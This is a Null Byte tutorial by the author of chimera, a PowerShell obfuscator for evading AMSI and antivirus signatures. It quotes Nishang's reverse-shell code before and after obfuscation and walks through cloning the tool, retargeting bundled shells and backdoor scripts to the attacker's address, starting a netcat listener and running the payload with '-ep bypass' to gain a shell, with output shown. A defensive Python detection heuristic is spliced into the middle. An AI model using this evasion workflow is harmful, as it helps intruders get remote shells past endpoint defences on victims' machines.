
How to bypass VirusTotal and AMSI detection signatures with chimera « Null Byte :: WonderHowTo



Microsoft’s built-in anti-malware solution aims to stop common attacks. Unfortunately for Windows 10 users, bypassing its detection takes almost no effort, and an attacker who knows how can do so with any number of tools.

Because Microsoft’s antimalware solution is Windows 10’s first line of defense, it has been the subject of a great deal of excellent security research. This article is a brief introduction to how attackers evade it completely.

What is Antimalware Scan Interface (AMSI)?

The backbone of the Microsoft antimalware stack introduced in Windows 10 is the Windows Antimalware Scan Interface (AMSI). Antivirus applications, including Windows Defender, can call its API to request a scan of files, scripts, and other content for malicious software. To briefly describe it, let’s look at Microsoft’s definition:

The Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI provides enhanced malware protection for your end users and their data, applications and workloads.

In the screenshot below, the attacker downloads a script (“shell.ps1”) containing nefarious code that immediately connects back to a remote server. When a PowerShell script is run this way, AMSI uses signature-based detection to identify the malicious activity.

Below is an image of the same script after obfuscation. Windows 10 runs it without complaint: no message is printed in the terminal while the connection to the attacker’s server is established.

How chimera works

Chimera is a PowerShell obfuscation script that I created to bypass Microsoft’s AMSI as well as commercial antivirus solutions. It processes malicious PowerShell scripts known to trigger antivirus software and uses simple string substitution and variable concatenation to evade common detection signatures. Below is an example of chimera at work.

The following is an excerpt from Invoke-PowerShellTcp.ps1, the same “shell.ps1” script that previously triggered AMSI.

$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}

#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)

#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)

VirusTotal reports 25 detections of the script (see below). This comes as no surprise as Invoke-PowerShellTcp.ps1 is incredibly popular.

Here is the same snippet after being processed by Chimera:

# Watched anxiously by the Rebel command, the fleet of small, single-pilot fighters speeds toward the massive, impregnable Death Star.
              $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
       # As the station slowly moves into position to obliterate the Rebels, the pilots maneuver down a narrow trench along the station’s equator, where the thermal port lies hidden.
          [bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
   # Darth Vader leads the counterattack himself and destroys many of the Rebels, including Luke’s boyhood friend Biggs, in ship-to-ship combat.

  # Finally, it is up to Luke himself to make a run at the target, and he is saved from Vader at the last minute by Han Solo, who returns in the nick of time and sends Vader spinning away from the station.
           # Heeding Ben’s disembodied voice, Luke switches off his computer and uses the Force to guide his aim.
   # Against all odds, Luke succeeds and destroys the Death Star, dealing a major defeat to the Empire and setting himself on the path to becoming a Jedi Knight.
           $PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`nCoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
# Far off in a distant galaxy, the starship belonging to Princess Leia, a young member of the Imperial Senate, is intercepted in the course of a secret mission by a massive Imperial Star Destroyer.
            $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)
   # An imperial boarding party blasts its way onto the captured vessel, and after a fierce firefight the crew of Leia’s ship is subdued.

VirusTotal reports 0 detections of the obfuscated version.
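Viewed from the defensive side, the before/after pair above shows exactly what chimera's transformations leave behind: member calls made through interpolated strings (`$obj."$a$b"()`), very long random variable names, well-known tokens with scrambled casing (`[bYte[]]`, `WrIte`, `LenGth`) and, when -b is used, backticks inside identifiers (`ne`w`-OB`je`cT` from the help text). The Python script below is an added example, not chimera's code or the author's: it scores a PowerShell script on those four indicators and runs over the two snippets quoted above. The canonical-token list, the 20-character name cut-off and the threshold of 5 findings are constructed for this example.

```python
"""Heuristic scorer for the artefacts chimera's transformations leave behind.

Added example for this article; it is not chimera's code or the author's.
It counts four indicators that are visible in the before/after snippets and
in the --help text:
  1. member access through an interpolated string:      $obj."$a$b"()
  2. long, random-looking variable names:                $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov
  3. known tokens with scrambled casing:                 [bYte[]], WrIte, LenGth
  4. backticks splitting an identifier outside a string: ne`w`-OB`je`cT
The canonical-token list and the thresholds are constructed for this example.
"""
import re

DYNAMIC_MEMBER = re.compile(r'\.\s*"[^"\n]*\$[A-Za-z_]\w*[^"\n]*"\s*\(')
VARIABLE = re.compile(r"\$([A-Za-z_]\w*)")
WORD = re.compile(r"[A-Za-z]+")
SPLIT_IDENTIFIER = re.compile(r"[A-Za-z]`[A-Za-z]")
STRING = re.compile(r'"[^"\n]*"|\'[^\'\n]*\'')
COMMENT = re.compile(r"#[^\n]*")

LONG_NAME = 20      # chimera's generated names are 20 to 40+ characters long
SUSPICIOUS_AT = 5   # total findings needed to flag a script (constructed threshold)

# Canonical spelling of tokens that occur in the article's snippet (constructed list).
CANONICAL = {
    "byte": "byte", "text": "text", "encoding": "Encoding", "ascii": "ASCII",
    "getbytes": "GetBytes", "getstream": "GetStream", "write": "Write",
    "length": "Length", "username": "username", "computername": "computername",
    "windows": "Windows", "powershell": "PowerShell", "running": "running",
    "user": "user", "copyright": "Copyright", "microsoft": "Microsoft",
    "corporation": "Corporation", "rights": "rights", "reserved": "reserved",
}


def strip_strings_and_comments(script: str) -> str:
    """Blank out quoted strings, then comments, so `n / `t escapes are not counted."""
    return COMMENT.sub("", STRING.sub('""', script))


def case_mangled_tokens(script: str) -> list:
    """Known tokens whose casing is neither lower, UPPER, Capitalised nor canonical."""
    hits = []
    for word in WORD.findall(script):
        canon = CANONICAL.get(word.lower())
        if canon is None:
            continue
        if word in (word.lower(), word.upper(), word.capitalize(), canon):
            continue
        hits.append(word)
    return hits


def score(script: str) -> dict:
    """Count each indicator and decide whether the script looks machine-obfuscated."""
    code_only = strip_strings_and_comments(script)
    long_names = {v for v in VARIABLE.findall(script) if len(v) >= LONG_NAME}
    findings = {
        "dynamic_member_calls": len(DYNAMIC_MEMBER.findall(script)),
        "long_variable_names": len(long_names),
        "case_mangled_tokens": len(case_mangled_tokens(script)),
        "split_identifiers": len(SPLIT_IDENTIFIER.findall(code_only)),
    }
    findings["suspicious"] = sum(findings.values()) >= SUSPICIOUS_AT
    return findings


# The two snippets quoted in the article: the Nishang original and chimera's output.
ORIGINAL = r'''
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
'''

OBFUSCATED = r"""
# Watched anxiously by the Rebel command, the fleet of small, single-pilot fighters speeds toward the massive, impregnable Death Star.
   $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
  [bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
      $PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`nCoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
    $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)
"""

if __name__ == "__main__":
    for name, sample in (("original", ORIGINAL), ("obfuscated", OBFUSCATED)):
        print(name, score(sample))
```

Heuristics like these are cheap triage for script content that reaches a defender through PowerShell script block logging or an AMSI provider: the untouched Nishang excerpt produces no findings at all, while chimera's version of the same four lines produces two dynamic member calls, ten long variable names and fourteen case-mangled tokens. They complement signature matching rather than replace it, since the whole point of the tool is that the string signatures no longer fire.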

Even though I uploaded a sample to VirusTotal for this article, doing so is bad practice. As stated in the privacy policy:

All partners receive samples that their antivirus engines did not detect as potentially harmful if the same sample was detected as malicious by at least one antivirus engine from another partner. This exchange of information helps address potential vulnerabilities across the security industry.

In simpler terms, if even one antivirus engine detects a file created by Chimera, that file is distributed to more than 75 antivirus companies. So do not upload files created with an obfuscation tool to VirusTotal. Instead, use a local, offline Windows 10 VM with antivirus solutions installed. That way, a detected file won’t be handed to every major security company on the planet.

Step 1: Clone the Chimera Repository

To get started with Chimera, use the following command to update the APT repository and install the necessary dependencies that Chimera needs to operate properly.

~$ sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git

[sudo] password for user:
Hit:1 http://kali.download/kali kali-rolling InRelease
Reading package lists... Done
Building dependency tree
Reading state information... Done
coreutils is already the newest version (8.30-3+b1).
curl is already the newest version (7.68.0-1+b1).
curl set to manually installed.
gawk is already the newest version (1:5.0.1+dfsg-1).
gawk set to manually installed.
grep is already the newest version (3.4-1).
libc-bin is already the newest version (2.31-2).
perl is already the newest version (5.30.3-4).
sed is already the newest version (4.7-1).
xxd is already the newest version (2:8.2.0716-3).
The following additional packages will be installed:
   libjq1 (1.6-1)
   libonig5 (6.9.5-2)
The following NEW packages will be installed:
   jq (1.6-1)
   libjq1 (1.6-1)
   libonig5 (6.9.5-2)
0 upgraded, 3 newly installed, 0 to remove and 0 not upgraded.
Need to get 378 kB of archives.

Then clone my Chimera repository with the git clone command. I put it in the /opt/chimera directory, as shown below.

~$ sudo git clone https://github.com/tokyoneon/chimera /opt/chimera

Cloning into '/opt/chimera'...
remote: Enumerating objects: 16, done.
remote: Counting objects: 100% (16/16), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 16 (delta 0), reused 16 (delta 0), pack-reused 0
Unpacking objects: 100% (16/16), 805.04 KiB | 1.79 MiB/s, done.

Next, recursively (-R) change ownership of the directory so the files can be accessed without root.

~$ sudo chown $USER:$USER -R /opt/chimera/

Now change (cd) into the new /opt/chimera directory.

~$ cd /opt/chimera/

And make the chimera.sh script executable so it can be run in Kali.

/opt/chimera$ sudo chmod +x chimera.sh

To see the available options, run Chimera with the --help argument.

/opt/chimera$ ./chimera.sh --help

    ░ ./chimera --file powershell.ps1 --all --output /tmp/payload.ps1

  files:
    -f, --file          powershell file.ps1 to obfuscate
    -o, --output        override default output file location

  options:
    -a, --all           same as: -l 0 -v -t -c -i -p -h -s -b -j -k -e
    -l, --level         level of string manipulation (0=random,1=low,
                        2=med,3=high,4=higher,5=insane. default: 0)
    -v, --variables     replace variables with arbitrary strings,
                        use -v  to utilize
                        custom wordlist as variable name substitutions
    -t, --typedata      replace data types with arbitrary strings (e.g.,
                        System.IO.StreamWriter). use -t  to
                        include more
    -c, --comments      replace comments with arbitrary strings
                        use -c  to utillized custom
                        text instead of random strings
    -i, --insert        insert arbitrary comments into every line
    -h, --hex           convert ip addresses to hexidecimal values
    -s, --string        obfuscate provided strings, use -s 
    -b, --backticks     insert backticks into provided string, e.g., ne`w`-OB`je`cT
    -j, --functions     replace function names with arbitrary strings
    -d, --decimal       convert obfuscated payload to decimal format
                        improves AMSI evasion; increases AV detection
    -g, --nishang       remove nishang-specific characteristics
    -k, --keywords      search obfuscated output for words that may trigger
                        AV/VT. By default searches for common words (backdoor,
                        payload,nishang), use -k  to include more
    -r, --random        randomize character punctuation
    -p, --prepend       prepend random number of spaces to lines

  misc:
    -e, --examine       preview snippets of output file contents
    -q, --quiet         supress non-essential messages
    -z, --no-art        if you hate awesome ascii art
        --help          you're looking at it

Step 2: Obfuscate a PowerShell Script

The shells/ directory contains several Nishang scripts and a few generic ones. All of them have been tested and work. There is no telling how Chimera will handle untested scripts, so it is recommended that you only use the provided shells.

/opt/chimera$ ls -laR shells/

shells/:
total 60
-rwxrwx--- 1 user user 1727 Aug 29 22:02 generic1.ps1
-rwxrwx--- 1 user user 1433 Aug 29 22:02 generic2.ps1
-rwxrwx--- 1 user user  734 Aug 29 22:02 generic3.ps1
-rwxrwx--- 1 user user 4170 Aug 29 22:02 Invoke-PowerShellIcmp.ps1
-rwxrwx--- 1 user user  281 Aug 29 22:02 Invoke-PowerShellTcpOneLine.ps1
-rwxrwx--- 1 user user 4404 Aug 29 22:02 Invoke-PowerShellTcp.ps1
-rwxrwx--- 1 user user  594 Aug 29 22:02 Invoke-PowerShellUdpOneLine.ps1
-rwxrwx--- 1 user user 5754 Aug 29 22:02 Invoke-PowerShellUdp.ps1
drwxr-xr-x 2 user user 4096 Aug 30 18:53 misc
-rwxrwx--- 1 user user  616 Aug 29 22:02 powershell_reverse_shell.ps1

shells/misc:
total 36
-rwxrwx--- 1 user user 1757 Aug 12 19:53 Add-RegBackdoor.ps1
-rwxrwx--- 1 user user 3648 Aug 12 19:53 Get-Information.ps1
-rwxrwx--- 1 user user  672 Aug 12 19:53 Get-WLAN-Keys.ps1
-rwxrwx--- 1 user user 4430 Aug 28 23:31 Invoke-PortScan.ps1
-rwxrwx--- 1 user user 6762 Aug 29 00:27 Invoke-PoshRatHttp.ps1

Before using the scripts, change the hard-coded IP address (192.168.56.101) to your Kali address. Use the ip command (for example, ip -brief address) to find your internal IP address and look for one in the 192.168.x.x range. If you don’t see one, your Kali VM is probably configured with NAT networking; power it off and switch it to a host-only network configuration.

/opt/chimera$ sed -i 's/192.168.56.101/<YOUR_KALI_IP>/g' shells/*.ps1

The default port in all of the scripts is 4444. Use sed again to change it if necessary.

/opt/chimera$ sed -i 's/4444/<YOUR_PORT>/g' shells/*.ps1

Now use the following command to obfuscate one of the available scripts with Chimera.

/opt/chimera$ ./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -o /tmp/chimera.ps1 -g -v -t -j -i -c -h -s -b -e

 _____________________________________________________

  ░░░░░░ ░░   ░░ ░░ ░░░    ░░░ ░░░░░░░ ░░░░░░   ░░░░░
 ▒▒      ▒▒   ▒▒ ▒▒ ▒▒▒▒  ▒▒▒▒ ▒▒      ▒▒   ▒▒ ▒▒   ▒▒
 ▓▓      ▓▓▓▓▓▓▓ ▓▓ ▓▓ ▓▓▓▓ ▓▓ ▓▓▓▓▓   ▓▓▓▓▓▓  ▓▓▓▓▓▓▓
 ██      ██   ██ ██ ██  ██  ██ ██      ██   ██ ██   ██
  ██████ ██   ██ ██ ██      ██ ███████ ██   ██ ██   ██
 _____________________________________________________

 ░ by @tokyoneon_

A lot is happening in that command. I’ll break down each argument briefly, but read the project documentation for a full explanation and the cheatsheet for examples. Also remember that --help gives fuller descriptions.

  • -f: The input file.
  • -o: The output file.
  • -g: Remove some Nishang-specific characteristics from the script.
  • -v: Replace variable names.
  • -t: Replace data types.
  • -j: Replace function names.
  • -i: Insert arbitrary comments into every line.
  • -c: Replace comments with arbitrary data.
  • -h: Convert IP addresses to hexadecimal format.
  • -s: Obfuscate the provided strings.
  • -b: Insert backticks into strings where possible.
  • -e: Examine the obfuscated file when the process is complete.

Step 3: Get a Shell

In a new terminal, start a Netcat listener to receive incoming connections. Always use -v, as some of the scripts do not produce a shell prompt when a new connection is established.

~$ nc -v -l -p 4444

listening on [any] 4444 ...

Move the chimera.ps1 File from Kali to a local Windows 10 computer. Then open a PowerShell terminal and run the file with the following command.

PS> powershell.exe -ep bypass C:\path\to\chimera.ps1

Back in Kali, the nc terminal produces the following output, with no complaints from AMSI.

~$ nc -v -l -p 4444

listening on [any] 4444 ...
192.168.56.105: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.105] 49725
Windows PowerShell running as user  on
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\target>

AMSI is great, but not hackproof

Creating defensive security tools is not an easy task. Microsoft’s antimalware scanning interface is a perfect example of this. A motivated attacker will always find a way to slip past security. In the case of chimera, strings are simply broken down into many parts and reconstructed as variables. Other projects like Invoke-Obfuscation take evasion to a masterful level.

Follow me on Twitter @tokyoneon_ and GitHub to keep up to date with my current projects. And for any questions and concerns, please leave a comment or ping me on Twitter.


Cover picture, screenshots and GIF from tokyoneon / Null Byte



